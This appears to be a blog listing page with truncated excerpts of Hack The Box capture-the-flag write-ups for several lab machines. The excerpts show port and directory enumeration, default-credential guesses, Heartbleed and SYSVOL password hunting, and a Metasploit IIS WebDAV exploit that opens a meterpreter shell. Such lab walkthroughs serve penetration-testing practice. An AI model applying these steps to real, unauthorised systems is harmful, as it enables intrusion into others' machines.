HTB Active

$ sudo nmap -A -T4 -p- Let’s enumerate SMB resources using SMBMap. $ smbmap -H $ smbclient // smb: > dir This share seems to be a copy of the SYSVOL’s. According to the information found in: Finding Passwords in SYSVOL & Exploiting Group Policy Preferences Attack Methods for Gaining Domain Admin Rights in Active Directory We need to find a file as groups.xml, scheduledtasks.xml and Services.xml where

HTB Sense

$ nmap -A -T4 -p- sense.htb $ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e We need to skip SSL certificate verification using -k option. $ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -k $ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -x .txt We’ve found 2 text documents. changelog.txt system-users.txt Company defaults?As we have a PfSense site, we can try with default Pfsense password (pfsense) Access to This

HTB Valentine

$ sudo nmap -T4 -A -p- $ gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -k $ nikto -h $ sudo nmap –script vuln -p 80 $ sudo nmap –script vuln -p 443 Based on these results, this box is Heartbleed vulnerable. $ python $ strings dump.bin Using aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==heartbleedbelievethehype Access to This is hexadecimal encoding. If we use a hexa

HTB Shocker

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- shocker.htb We just have an Apache on port 80 and OpenSSH on port 2222. Access to http://shocker.htb ruben@kali:~/htb$ gobuster dir -u http://shocker.htb -w /usr/share/wordlists/dirb/common.txt -e We have a cgi-bin folder that may contain script files. Let’s use again Gobuster but this time searching files by file type.(.sh,.py) $ gobuster dir -u http://shocker.htb/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -x py -x sh Based on the box name

HTB Mirai

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- mirai.htb If we access to http://mirai.htb, There is another http port. Access to http://mirai.htb:32400 to be finally redirected to http://mirai.htb:32400/web/index.html As descrived by Nmap results, we have a Plex Media server. ruben@kali:~/htb/mirai$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e –wildcard Access to http://mirai.htb/admin/ So, do we have a Raspberry maybe using Raspbian?Default Raspbian credentials are pi:raspberry As we have SSH open, we can try

HTB Bank

ruben@kali:~/htb/bank$ nmap -sV -T4 -p- There is an Apache 2.4.7 on port 80 and a DNS Server on port 53.If you access to there is an Apache2 default site. As there is a DNS Server active may seem worth if we add the hostname to the /etc/hosts.All HTB machines have the same pattern: Box_name.htb After this step, if we access to http://bank.htb we obtain a more promising site. ruben@kali:~/htb/bank$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

HTB Beep

$nmap -p- -T4 -A Results: $gobuster dir -u -w /usr/share/wordlists/dirb/big.txt -e -o beep.out -k Access to So, this box contains an Elastix instance. According to Wikipedia description: Elastix is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialing. The Elastix 2.5 functionality is

HTB Arctic

$sudo nmap -A -T4 -p- 8500/tcp open fmtp?This is an odd open port. Let’s check it. Access to These files are part of a Cold Fusion 8 installation. $searchsploit ColdFusion $searchsploit -x 14641 Access to What is Rds? ColdFusion RDS is a security component of ColdFusion Server used by the ColdFusion Administratorand ColdFusion Studio to provide remote HTTP-access to files and databases.You can use RDS to manage

HTB Blocky

$nmap -T4 -p- -sV -A Open Ports: 21/tcp    open   ftp       ProFTPD 1.3.5a 22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu)) 25565/tcp open   minecraft Minecraft 1.11.2 http-generator: WordPress 4.8 $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e PhpMyAdmin login site: WordPress admim login site: Uploads folder

HTB Granny

$nmap -T4 -A -sV -p- $nmap -p 80 –script vuln $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e $nikto -h Based on Grandpa’s vulnerability… msf5 > search CVE-2017-7269 msf5 > use 0 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) >set rhosts  msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run meterpreter > getuid meterpreter > shell c:\windows\system32\inetsrv>whoami meterpreter > run post/multi/recon/local_exploit_suggester  meterpreter > getpid meterpreter > ps